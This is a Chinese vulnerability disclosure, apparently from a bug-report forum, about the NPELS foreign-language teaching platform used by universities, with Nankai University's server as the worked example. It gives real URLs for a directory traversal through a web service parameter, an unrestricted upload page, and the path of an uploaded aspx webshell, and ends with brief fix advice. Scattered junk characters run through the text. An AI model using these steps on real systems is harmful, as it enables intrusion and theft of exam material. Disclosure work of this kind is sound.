新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
. x6 S" f  P% j8 }; P& e# G1 W
3 P" {8 s0 }' }2 d详细说明：

以南开大学的为例:
http://222.30.60.3/NPELS
  c" H7 A9 k- M; a% ONPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
* H. A8 o$ X3 ]' k; ]: L: x. k9 v, b& v3 r<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
  q7 t4 k* q8 L# M</setting>
8 k9 F" K- g; ?! `. ~# N- k及版本号
; g$ T5 k2 X4 z# I6 q5 Z5 ^<add key="TVersion" value="1, 0, 0, 2187">
</add>
. \, @: B! J) X8 @) Y- T直接访问
1 q+ g# l+ c8 |" Whttp://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
7 _) N: [1 c, D) C$ i5 p5 r3 rhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
$ V9 G5 |* `- u! s! P( c! E
1 }7 @4 z; Y5 `" X3 q发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
& U2 v3 }5 ^! j8 O$ w可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
; {, r" A# a: ~! i( T+ m$ j
OOXX
. Z9 P9 s/ [  K; d8 n6 g, g
+ }- s: A3 {" G2 N  yGoogle "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
& f) w: e% t9 b% H  a5 r漏洞证明：
( t2 @# ~6 ?2 m, P" P# ^
列目录：
# o# B1 \$ E1 q3 m+ Y* w8 Phttp://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
2 ?* Z2 {7 E7 ]; n- jhttp://222.30.60.3/npelsv/editor/editor.htm

上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

" |/ J0 ?! g& ^修复方案：
0 R. c- g% S# e* m$ ?: z' [9 E好像考试系统必须使用 CommonService.asmx
; P* r3 f8 @6 E% Q; U4 L最好配置文件加密或者用别的方式不让它泄露出来
1 M2 c7 c7 V7 R  T# [并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​